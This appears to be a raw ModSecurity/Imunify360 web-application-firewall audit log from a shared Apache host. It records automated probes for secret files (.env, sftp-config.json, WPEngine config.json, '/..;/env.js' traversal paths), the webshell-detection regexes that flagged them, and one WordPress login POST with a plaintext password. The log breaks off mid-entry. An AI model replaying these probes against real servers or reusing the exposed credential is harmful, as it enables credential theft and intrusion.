"(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/js/js/luxury-mini-buses-coaches.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/js/js/luxury-mini-buses-coaches.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281420182145 25039 (- - -) Stopwatch2: 1751281420182145 25039; combined=5681, p1=225, p2=5149, p3=0, p4=0, p5=306, sr=72, sw=1, l=0, gc=0 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b4e2b212-Z-- --580e3451-A-- [30/Jun/2025:16:33:41.459482 +0530] aGJvDTJ5JKn4EOxWiuppNgAAAFA 192.253.209.54 22077 192.168.74.40 443 --580e3451-B-- POST /sources/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --580e3451-C-- 0x%5B%5D=DTAB --580e3451-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --580e3451-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281421394183 65770 (- - -) Stopwatch2: 1751281421394183 65770; combined=2002, p1=162, p2=1479, p3=0, p4=0, p5=361, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --580e3451-Z-- --4f6c325f-A-- [30/Jun/2025:16:33:41.824327 +0530] aGJvC14JvBqfS1k7uRVn5wAAAFI 123.187.240.242 34499 192.168.74.40 80 --4f6c325f-B-- GET / HTTP/1.1 Host: www.cesarpetcare.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --4f6c325f-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.1.18 X-Redirect-By: WordPress Location: https://cesarpetcare.com/ -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --fed7280b-Z-- --253aab15-A-- [30/Jun/2025:16:33:45.224480 +0530] aGJvEbpDbab8C7BhY4afwAAAAEw 192.253.209.54 36987 192.168.74.40 443 --253aab15-B-- GET /enviroments/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive --253aab15-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --253aab15-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281425171087 53858 (- - -) Stopwatch2: 1751281425171087 53858; combined=903, p1=94, p2=616, p3=0, p4=0, p5=193, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --253aab15-Z-- --7f91d256-A-- [30/Jun/2025:16:33:45.991869 +0530] aGJvEZ4tZwI9VhjyFFR7jwAAAEI 20.171.207.232 33346 192.168.74.40 443 --7f91d256-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/festivals-calendar.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --7f91d256-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --7f91d256-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/festivals-calendar.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/festivals-calendar.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281425970839 21324 (- - -) Stopwatch2: 1751281425970839 21324; combined=5100, p1=210, p2=4697, p3=0, p4=0, p5=193, sr=78, sw=0, l=0, gc=0 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --801a5333-Z-- --c9edbd17-A-- [30/Jun/2025:16:33:47.203055 +0530] aGJvE7Ywjv2GcXOlZ0RWqQAAABE 192.253.209.107 63847 192.168.74.40 443 --c9edbd17-B-- POST /enviroments/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --c9edbd17-C-- 0x%5B%5D=DTAB --c9edbd17-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --c9edbd17-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281427108687 94692 (- - -) Stopwatch2: 1751281427108687 94692; combined=1537, p1=182, p2=1102, p3=0, p4=0, p5=252, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c9edbd17-Z-- --093e092e-A-- [30/Jun/2025:16:33:48.384332 +0530] aGJvFJ4tZwI9VhjyFFR7kQAAAEI 20.171.207.232 33346 192.168.74.40 443 --093e092e-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/aainag/privacy-policy.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --093e092e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --093e092e-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/aainag/privacy-policy.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --978f972c-Z-- --ba4cff35-A-- [30/Jun/2025:16:34:31.796126 +0530] aGJvP8NDEoPcf0uXTmEWMQAAAEc 192.253.209.76 16423 192.168.74.40 443 --ba4cff35-B-- GET /.vscode/sftp.json HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive --ba4cff35-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --ba4cff35-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281471737185 59339 (- - -) Stopwatch2: 1751281471737185 59339; combined=4229, p1=91, p2=3952, p3=0, p4=0, p5=186, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ba4cff35-Z-- --7799e470-A-- [30/Jun/2025:16:34:33.072212 +0530] aGJvQX3h_Nu4NETt1nnNJQAAABI 192.253.209.54 28935 192.168.74.40 443 --7799e470-B-- GET /.json HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --7799e470-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --7799e470-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281473026037 46446 (- - -) Stopwatch2: 1751281473026037 46446; combined=5214, p1=97, p2=4910, p3=0, p4=0, p5=207, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --7799e470-Z-- --f864e84a-A-- [30/Jun/2025:16:34:34.110353 +0530] aGJvPzJ5JKn4EOxWiuppRAAAAFA 51.89.207.180 41036 192.168.74.40 443 --f864e84a-B-- POST /wp-login.php HTTP/1.1 Host: thewizblog.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Connection: keep-alive Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 referer: https://thewizblog.com/wp-login.php Content-Length: 109 Content-Type: application/x-www-form-urlencoded --f864e84a-C-- log=marketingtech&pwd=RxBBJn34rEhgpWs&wp-submit=Log+In&redirect_to=https%3A%2F%2Fthewizblog.com%2Fwp-admin%2F --f864e84a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-LiteSpeed-Tag: 9c0_L -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --5b591953-Z-- --580ec32b-A-- [30/Jun/2025:16:34:40.937379 +0530] aGJvSLzTKkleVdd1y6U4fwAAAAQ 192.253.209.104 15591 192.168.74.40 443 --580ec32b-B-- GET /_wpeprivate/config.json HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --580ec32b-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --580ec32b-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/008_i360_wordpress.conf"] [line "1873"] [id "77350222"] [msg "IM360 WAF: Information disclosure in WPEngine plugin for WordPress||MV:/_wpeprivate/config.json||RSV:7.05||RS:0||T:APACHE||REQUEST_URI:/_wpeprivate/config.json||"] [severity "CRITICAL"] [tag "wp_core"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281480883188 54549 (- - -) Stopwatch2: 1751281480883188 54549; combined=2244, p1=80, p2=1977, p3=0, p4=0, p5=187, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --580ec32b-Z-- --9818ec13-A-- [30/Jun/2025:16:34:42.419019 +0530] aGJvSsw7AedGR9643eFB7wAAACU 57.141.0.17 54136 192.168.74.40 443 --9818ec13-B-- GET /Rajasthan-Travel-Guides/rajasthan-tours-from-agra/rajasthan-tours-from-jodhpur/rajasthan-tours-from-jaipur/rajasthan-tours-from-agra/rajasthan-tours-from-delhi/images/rajasthan-tours-from-ahmedabad/luxury-mini-buses-coaches.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --9818ec13-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --9818ec13-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/Rajasthan-Travel-Guides/rajasthan-tours-from-agra/rajasthan-tours-from-jodhpur/rajasthan-tours-from-jaipur/rajasthan-tours-from-agra/rajasthan-tours-from-delhi/images/rajasthan-tours-from-ahmedabad/luxury-mini-buses-coaches.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/Rajasthan-Travel-Guides/rajasthan-tours-from-agra/rajasthan-tours-from-jodhpur/rajasthan-tours-from-jaipur/rajasthan-tours-from-agra/rajasthan-tours-from-delhi/images/rajasthan-tours-from-ahmedabad/luxury-mini-buses-coaches.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/Rajasthan-Travel-Guides/rajasthan-tours-from-agra||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281482402251 16946 (- - -) Stopwatch2: 1751281482402251 16946; combined=3231, p1=171, p2=2903, p3=0, p4=0, p5=156, sr=72, sw=1, l=0, gc=0 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --5e9d597b-Z-- --f98ccd52-A-- [30/Jun/2025:16:34:45.130110 +0530] aGJvTbzTKkleVdd1y6U4gAAAAAQ 192.253.209.64 44103 192.168.74.40 443 --f98ccd52-B-- GET /sftp-config.json HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive --f98ccd52-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --f98ccd52-H-- Message: Matched phrase "sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "9"] [id "77316758"] [msg "IM360 WAF: Private file access||QS:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281485086903 43524 (- - -) Stopwatch2: 1751281485086903 43524; combined=4005, p1=104, p2=3755, p3=0, p4=0, p5=146, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f98ccd52-Z-- --37fc0015-A-- [30/Jun/2025:16:34:45.629096 +0530] aGJvSwms4GQJbNFEXqh5LwAAAFs 51.89.207.180 54896 192.168.74.40 443 --37fc0015-B-- GET /wp-login.php?redirect_to=https%3A%2F%2Fthewizblog.com%2Fwp-admin%2F&reauth=1 HTTP/1.1 Host: thewizblog.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Connection: keep-alive Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 referer: https://thewizblog.com/wp-login.php Cookie: wordpress_test_cookie=WP%20Cookie%20check; tk_ai=jetpack%3AU02TrCIbuSFWLgxZHVYFVnw1 --37fc0015-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure; HttpOnly Set-Cookie: wordpress_a9eb59679ad03aa872868369f11c068a=%20; expires=Sun, 30-Jun-2024 11:04:45 GMT; Max-Age=0; path=/wp-admin -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1940ad5e-Z-- --7a30de7d-A-- [30/Jun/2025:16:35:37.156613 +0530] aGJvgQC_q2cBiBfjIEBntgAAABY 192.253.209.95 52241 192.168.74.40 443 --7a30de7d-B-- GET /..;/env.dev.js HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive --7a30de7d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --7a30de7d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281537139950 17008 (- - -) Stopwatch2: 1751281537139950 17008; combined=4880, p1=118, p2=4575, p3=0, p4=0, p5=187, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --7a30de7d-Z-- --c268d168-A-- [30/Jun/2025:16:35:38.595191 +0530] aGJvgjX-tSYHdPnvNLtyLQAAACQ 192.253.209.79 52407 192.168.74.40 443 --c268d168-B-- GET /..;/env.development.js HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive --c268d168-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --c268d168-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281538574145 21380 (- - -) Stopwatch2: 1751281538574145 21380; combined=5518, p1=271, p2=5034, p3=0, p4=0, p5=213, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c268d168-Z-- --27142d35-A-- [30/Jun/2025:16:35:40.284716 +0530] aGJvhKvReB2qqJm9DDuGHwAAAAY 192.253.209.101 56579 192.168.74.40 443 --27142d35-B-- GET /..;/env.js HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --27142d35-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --27142d35-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281540265807 19998 (- - -) Stopwatch2: 1751281540265807 19998; combined=5308, p1=119, p2=4952, p3=0, p4=0, p5=237, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --27142d35-Z-- --48806a3c-A-- [30/Jun/2025:16:35:41.671837 +0530] aGJvhbU6Mn-8rkg2zVU6hQAAAB0 192.253.209.96 6493 192.168.74.40 443 --48806a3c-B-- GET /..;/env.prod.js HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --48806a3c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --48806a3c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281541646998 25337 (- - -) Stopwatch2: 1751281541646998 25337; combined=6821, p1=395, p2=6147, p3=0, p4=0, p5=278, sr=129, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --48806a3c-Z-- --eee53869-A-- [30/Jun/2025:16:35:43.098622 +0530] aGJvh1nkGKkpOZ5V2S9FygAAAGU 192.253.209.81 1905 192.168.74.40 443 --eee53869-B-- GET /..;/env.production.js HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive --eee53869-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --eee53869-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281543082953 16113 (- - -) Stopwatch2: 1751281543082953 16113; combined=3974, p1=93, p2=3690, p3=0, p4=0, p5=191, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --eee53869-Z-- --f6afda17-A-- [30/Jun/2025:16:35:43.483337 +0530] aGJvhzSFvs-H_7nBXVD9BgAAAEo 57.141.0.11 47008 192.168.74.40 443 --f6afda17-B-- GET 